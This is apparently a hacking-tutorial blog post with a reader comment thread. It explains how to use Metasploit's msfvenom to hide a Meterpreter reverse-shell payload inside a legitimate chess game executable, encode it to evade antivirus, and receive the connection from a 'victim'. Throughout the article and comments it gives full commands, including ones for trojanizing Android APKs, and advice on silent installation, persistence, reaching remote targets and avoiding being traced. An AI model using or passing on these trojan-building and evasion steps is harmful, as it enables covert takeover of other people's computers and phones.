Welcome back, my hacker novitiates!
Eluding and evading antivirus software and intrusion detection systems is one of the most critical tasks of the hacker. As soon as a new exploit is developed and discovered, the AV and IDS developers build a signature for the attack, which is then likely to be detected and prevented.
One obvious way around this problem is to develop your own exploits, and that is what we have begun to do in our Exploit Building series. Another potential method is to change the encoding, thereby changing the signature of the exploit and/or payload.
Previously, to re-encode a payload in Metasploit, you had to pipe msfpayload through the msfencode command as shown in this tutorial. Recently, Rapid7, the developers of Metasploit, introduced a new command that takes the place of the clunky combination of msfpayload and msfencode to streamline the process of re-encoding a Metasploit payload. Let's take a look at it in this guide.
A Quick Note About Re-Encoding Payloads
Re-encoding a Metasploit payload used to work for evading AV and other security devices, but the people who develop AV software are not dumb. They have now found ways to detect even a re-encoded payload from Metasploit.
Now, rather than just look for the signature of the payload you have encoded, they simply look for the signature of the template that Metasploit uses to re-encode. In this way, no matter how many different encoding schemes you use, the template is the same and the AV software has its signature.
Don't fret though, there are still ways to re-encode a payload that are still undetectable by AV software. I will be starting a new series soon on evading AV software where I will demonstrate many of the ways, so stay tuned for that.
Step 1: Fire Up Kali & Start Metasploit
Let's start by firing up Kali and opening the msfconsole. You can do that by simply typing "msfconsole," or you can use the GUI and go to Applications -> Kali Linux -> Top 10 Security Tools -> Metasploit Framework. When you do so, you will find yourself in this interactive Metasploit shell.
Step 2: See the Msfvenom Options
Now, at the prompt, type "msfvenom" to pull up its help page (you can also use the -h switch).
msf > msfvenom
Let's take a look at some of the most important options in this list.
- -p designates the Metasploit payload we want to use
- -e designates the encoder we want to use
- -a designates the architecture we want to use (default is x86)
- -s designates the maximum size of the payload
- -i designates the number of iterations with which to encode the payload
- -x designates a custom executable file to use as a template
Step 3: List the Encoders
Encoders are the various algorithms and encoding schemes that Metasploit can use to re-encode the payloads. Metasploit has numerous encoding schemes, and we can look at these by typing:
msf > msfvenom -l encoders
Metasploit will then list all of the available encoders with each's rank and description. Below, I have highlighted the shikata_ga_nai encoder that we used in a previous tutorial. Note that shikata_ga_nai is ranked "excellent."
Step 4: View the Payload Options
We can use msfvenom to check the options that we need to set for any payload similar to "show options" in the Metasploit console. The command to check any payload's options is:
msf > msfvenom -p <payload name> -o
So, if we want to check the options for the windows/meterpreter/reverse_tcp payload, we simply type:
msf >msfvenom -p windows/meterpreter/reverse_tcp -0
When we do so, Metasploit responds like below.
So, if we want to work with this payload, we now know what options we need to set in the msfvenom command.
Step 5: Create a Custom Windows Executable
Now, let's create a custom Windows executable with a custom template. Although we can create a payload without a custom template, we have a better chance of getting past security devices and AV if we use a custom template. In this case, we will use a chess game named "chess.exe." The idea here is that we will embed the meterpreter payload into the chess game and then, when the victim opens the game to play chess, it will open a meterpreter session on our system.
I have placed the chess game in the /usr/share directory.
To create a malicious executable with the windows/meterpreter/reverse_tcp embedded inside, we simply type:
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= <your local IP> LPORT=<whatever port you want to listen on> -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe
- -p /windows/meterpreter/reverse_tcp designates the payload we want to embed
- LHOST designates the local host
- LPORT designates the port we want to listen on
- -x designates the template we want to use and the path to it
- -e x86/shikata_ga_nai designates the encoder we want to use
- -i 200 represents the number of iterations
- -f exe designates we want to create an executable (.exe)
- chess.exe designates the name of the file created
When the victim clicks on the chess.exe file, the meterpreter payload will be activated and will look to make a connection back to your system (LHOST). For the connection to succeed, you will need to open the multi-handler in Metasploit to receive the connection.
msf >use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
This new command in Metasploit, msfvenom, can streamline the process of re-encoding and embedding payloads, but is no guarantee for getting past AV software any longer. I will be starting a new series on evading AV software soon with the latest techniques, so keep coming back, my hacker novitiates!
Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:
78 Comments
hello sir, i'm new here. i know this is out of the subject, but i'm going to university soon and i need your advice whether to take the computer science program or information technology program. Any information helps, thanks btw!
PS: my goal is to become a great hacker like you lol
Either path can help you become a great hacker. At most schools, the computer science program is more rigorous and will provide you greater depth. The information technology program will likely get a quicker start and then you can continue your education in security and hacking.
thanks sir OTW for your advice, i think i will take the information technology program as i'm not really familiar with programming yet.
Also, is it true that to bypass AV and find zero-day vulnerabilities, you have to be really good at coding ?
zst hold ur path and keep learning and practicing thats can make u hacker ... last of all this website will help u much :P btr thn a school :D
whr i will get tht output malicious file .?? becoz size of my file resides in /usr/share not changed.??
King, You'll get the output file in the working directory of MSF. To specify, I usually do "> /root/out/file.exe" just to stay more organized.
Edited to delete...(please downvote so it dissapears :p)
Hi,
How about mixing this msfvenom methods with exploit from another article of yours:
https://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-ms-word-embed-listener-your-roommates-computer-0140868/
Is it possible to attach encoded payload to MS Office filetype or it is not relevant as the exploit will be detected whatsoever?
Cheers
OTW
Hi, I am new on here and I've been following your tutorials, so far it's been great, amazing and pretty much easy to follow. Pls keep on these lovely and great works.
However, I've tried encoding an executable file just like above in your post and AV just won't give me a chance, even on my Grandpa's PC.....
So, I'm really counting on your words that you'd post other better ways to bypass AV, I know you must be a busy man and probably have so much on your hands, but I'd really appreciate it if you can make it soon....PLEASE!!!
Thanks In Advance
Phoenix
Metasploit encoding is not designed to evade AV but to deal with bad characters, etc. You can use executable envelopes which encrypt the executable. I suggest looking into the Veil framework.
OTW,
I followed your tut as precise as i could. But i still get stuck on the part when i open the payload on my VM windows 7 it says it dont respond and i get no connection back to my kali linux that has the same IP and port (on LAN). It just says "Starting the payload handler". I belive it might be a connection problem but I´m not sure.
Are you certain you can connect? Can you ping the system?
I found the problem: I was using Oracle VBox and it uses 10.x.x.x IP´s (I used 192.168.1.x) though i could actually ping the system. I have reasolved it by using a computer outside my LAN to see if it works and it did. I still cant change the VBox IP but at least it works.
You can change the IP inside VBox by simply typing;
ifconfig eth0 newIP address
Just a small question. Could you please tell me what the iterations option does?
The iterations option determines how many times the encoding scheme is run.
Thanks for the clarification
I am facing a problem here. Searched all over the internet.
"Offset 0 outside of image source"
somebody please help with this error
Mathew:
You really aren't giving us any information to work with. How about a screenshot?
It was my bad. I thought you could just do it with any .exe file. So I had created a notepad file and saved it as. exe. That was the problem. Anyway, I downloaded a chess game setup and tried to do with that but that too returned an error. Could you please tell me the reason for that? I, then, installed the game and used the .exe file of the game. The infected file was made but when I tried opening it on the target system, it just won't open. I tried with vlc.exe (VLC media player) too but same problem. The infected file is not opening. The target system is running on Windows 8.1. What could be the problem?
Mathew:
It's really hard to diagnose your problem and help you with so little information. Could you send some screenshots to help us understand what you did and what might be going wrong?
OTW
Also the infected file has a size of just 6kB whereas the original file was over 8MB. I have attached the screenshot showing how I created the file.
From this screenshot, it looks like you copied the command incorrectly. There is a 0 before the f that should not be there.
Please check you typing first, before presenting your problem to this forum. We are not here to correct your typos.
Extremely sorry about that post. Really sorry. I corrected my mistake but the file is still not opening. I disabled the antivirus and the firewall also.
Where did you get this executable template? It is most likely the source of you problems and msfvenom isn't able to properly insert the payload. Try one of the default templates in metasploit before trying your own. The default templates are located in the /usr/share/metasploit-framework/data/templates directory.
Thanks for the tutorial, ((i made a c++ program a while back that generates a script that randomly uses different encoders ))
Anyways what i am interested in is how can you make the payload persistent where it calls back to the attacker machine every half hour or so?
Another cool thing would be how can i make a free server online and have the call back go to there?
Well, just set the LHOST to the server IP.
I don't know about "persistent," but I do know it's possible. You might have to make your own shellcode, though. I'm pretty sure MSFVenom doesn't come with an option like that.
Hello!
Consider that I am very, very beginner using metasploit!
I saw many tutorials teaching create payloads for android but all teach only how to create a unique apk for the payload. It would be possible to embed the payload in a apk (or for exepmle a picture ) already existing in the same way that is done in this tutorial (creating a custom picture or apk with a custom picture or apk template) ?
Thank you!
Sorry bad English ! (google translate)
Yes its possible! The command is as follows:
msfvenom -p android/meterpreter/reversetcp LHOST=<your ip> LPORT=<port> -x <existing apk file> R -o <file to output>
So, this command reads, create a file with the payload of the android meterpreter using the template file and make a new file with the payload in it...
I couldn't make it work
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
hey, thanks for the tip! does this still launch in the phone? and is there a way to install it silently?(without user interaction after editing the Manifests of the apk?
I am typing the command
msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.88 LPORT=4444 -x notepad.exe -e x86/shikataganai -i 200 -f exe > evil.exe
And all it outputs is a 0 byte file that Windows can not run. The command runs fine.
Good tutorial. I just am wondering can I use a dynamic DNS name instead of a public ip address when making the trojan.apk IE name.servehttp.com. Also, can my ip be tracked by doing this. Would it be good to use a VPN of somekind when deploy this hack.
Hello !
I'm beginner using metasploit I successfully make a payload following your tutorials and tested it with windows 8 and it works . My question is how can i hack a remote computer in WAN ? I only tested it on LAN .
Thank You
Sorry for the bad Englsih
You can set the LHOST to your external IP I believe.
Hi when I try to find the options for the payload, it won't come up for me. here's my screenshot. sorry very new to this.
file:///root/Pictures/Screenshot%20from%202015-09-26%2021:45:54.png
sorry it won't seem to let me upload a picture but it says error: missing required argument for option.
thats after I type msfvenom -p windows/meterpreter/reversetcp -o
Seems like you have a typo. It should be windows/meterpreter/reverse_tcp. You are missing the down dash.
couldn't we just run killav.rb to stop the AV?
(sorry I found this thread late)
Kill.av only works after you have the payload on the system. In many cases, the AV will keep you from ever getting the payload on the system.
In one of the other guides ("spying one") we had to specify the exploit we had to use, like the "use exploit/windows/fileformat/ms14017rtf" in this guide I did not see where we would do this in this guide.
Is this a totally different thing?
Also is this persistent so that we may come back to the victim later?
Thanks
The payload is specified with the -p (for payload) option. It's written above,
"-p /windows/meterpreter/reverse_tcp designates the payload we want to embed"
Also to answer you second question, this has nothing to do with Persistence. Once you have a meterpreter session you can run you post exploitation modules including persistence pivoting etc..
Hello!
Before I start I'd like to say this is a very good tut. Nice work!
I followed your tutorial and I successfully created a payload, but its size is 0bytes. I retried many times but still the same result. I can neither open it on my (test) phone as it shows "Error parsing the package".
Am I missing something? Please help me.
Thanks in advance!!
The results you cite are usually a result of typographical errors. Can you post of screenshot?
Here is a screenshot. As you can see, the command was executed successfully without any error message but the payload (ie FinalPayload.exe) is 0bytes.
My guess is that the file Core-Temp-Setup.exe either doesn't exist, is empty or is not an exe.
It really exists. I put it there myself and I have tried with other exe files.
You need to use one of the default templates built into Metasploit. Metasploit can't work with your exe.
What are those please? How do I use them?
hello Sir
Firstly I am very thankful to you for the information what you gave us is absolutely great, I am having a small doubt if I want to send that file instead of game by other means like port forwarding etc.... How to send please can you tell me the process that I have to follow .This is purely for educational purpose not with any other intention being b-tech computer science student I want to learn hacking and become a ethical hacker and a pro like you Sir, So if you understand please help me with the required information
Thank you
Sir
Welcome to Null Byte!
I'm not sure what you are asking here. Will you try re-stating your question?
OTW
I opened metasploit framework, typed in: msfvenom . It is showing " * exec: msfvenom" (without quotes") .After few seconds ,I automatically gets returned to msf prompt.I am using Latest Kali Linux(as per jan 2016).Please help,sir!
msfvenom is seperate from metasploit.
Try running msfvenom from terminal, not from inside msfconsole.
Hi everybody. I am having the same problem. I can't view the payload options.
On that soame note, I can only view the encoders and msfvenom options if I run under sudo.
I am running metasploit from the terminal, not from inside msfconsole.
Can anybody tell me what could be wrong here? Thanks.
Hello!
When i try to run the .exe on my Windows VM it just crashes (don't respond).
I used the templatex86windows.exe from metasploit (VM OS: win7x86).
The encoding worked without errors and I can ping my vm / host.
I also tried it with another encoder, then the program doesnt crash and I see that the VM tries to reach my host (wireshark), but still my shell won't open. I started the handler and set all options (LHOST,LPORT).
Does someone have a clue what i could be missing?
Thanks!
Did you ever figure this out?
I'm interested if you have found a solution of your issue.
I am typing the command
msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.88 LPORT=4444 -x notepad.exe -e x86/shikataganai -i 200 -f exe > evil.exe
And all it outputs is a 0 byte file that Windows can not run. The command runs fine.
Change "reversetcp" to "reverse_tcp"
Sir i am getting this error while running msfvenom, msfpayload
Can you please help me.
Hello Sir, i'm new here but i'm having some issues with msfvenom to where it'll make payloads just fine except for one thing when i send the payload to my computer and open the file it'll open just fine but msfconsole won't get a connect back and i'm just wanting some help with that issue
Whats -o out there
Hello OTW,
Like some of us, I am having trouble with taping the following command :
msfvenom -p windows/meterpreter/reverse_tcp -o
metasploit always return the same answer : error: missing required argument for option.
I have been trying to check where I did a mistake but I can't figure it out.
Hope you'll help :/
Kane
Do msfvenom -h and check the options for payload
Hi OTW,
I was wondering on how to find your local ip, is it from your router or when you look it up "ip" on google?
Your local ip it's the ip address of your local machine.
Your ip address on google it's your public IP that can be reach from internet.
Do ipconfig on windows and ifconfig on Linux system
i have encountered this issue and I have tried the same argument inside msfconsole and without it thereby I failed to create the chess.exe file as well. my computer OS is windows 10 and x64, msfconsole successfully worked out but cannot figure out the relevant problem. Note that I also used the statement following the Usage statement.
Anyone Can help me with this? I cannot proceed to the next
I have simile problem and i have x64 Bit....
What can i to do and this problem to solve?
Also have a look at this please.
Hi, I am new in this world and enjoying the tutorials.
I have 3 questions.
1) where can i get the chess.exe? (i presume, need to download that)
2) Will the same way work with other type of file extensions like jpg/pdf/doc/docx etc?
3) I exploit a windows 8.1 vm by running the exe as non-admin user. In msfconsole, getuid returns the username. when I tried getsystem following errors occured:
meterpreter > getuid
Server username: WIN-LNG8CDNPLV4\mamun
meterpreter > getsystem
meterpreter >
unknown command:msfvenom
Hey there OTW! Like many other I have just started your tutorials. When I looked at the options for msfvenom, I noticed there is a missing switch for showing payload options:
Is there a way for me to go in through the normal terminal and fix this (or any other method)? As far as I can tell, everything else should work just fine, I'll just need to write a few things down before I launch the whole command to encode.
Thanks!
E boy hack em all :D
Metasploite does not detect the payload even after running the payload on the target PC.
1:-
First i created a payload using
msfvenom -a x64 -p windows/x64/meterpreter/reversetcp lport=8080 lhost=192.168.10.5(using ifconfig) -f exe -e x84/shikataga_nai -i 3 -b '\x00\xff' >/root/desktop/ABC.exe
!command executes properly and a payload is created
2:-
then i copy the payload to target device (windows 10)
3:-
i start the msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.10.5
lhost => 192.168.0.5
msf exploit(handler) > set lport 8080
lport => 8080
4:-
then i run the payload on the target device
Expected behavior
Started reverse TCP handler on 192.168.0.10:5
Starting the payload handler
/It should open a session/
Current behavior
msfconsole continues to wait for the reponse from the handler and just continues to blink the cursor.
I have tried multiple techniques but id does not work.I have executed the handler multiple times but still not works.I have tries the lport to be 4444 but did not work.
But when i listen using wireshark it gets some response when i execute the handler on target computer.
System stuff
kali linux 4.9 or 2017.4.4
Metasploit version
framework 4.14.10-dev
console same as above
kindly help because i am stuck at this since long.Thanks in advance
I am running Kali on Virtual Box and i am using a wifi adapter directly for kali (ALFA AWUS036NH).I am not using any bridged network or nat network.My target device is a PC WIndows-10 .Both the target and KAli are in same network.
unfortunately Kaspersky can simply find that even with 200 time using shikataganai
How can I get the output, after victim opening the exploit file...?
I sent .c file and I didn't get any output evenafter victim opening the file..?
I tried the same explotion with android payload as:
msfvenom -p android/meterpreter/reversetcp LHOST= 192.168.43.45 LPORT=6996 -e x86/shikataga_nai -i 200 -f asp >chess.asp
But it showing error as:
Can anyone help me to resolve this issue....
Share Your Thoughts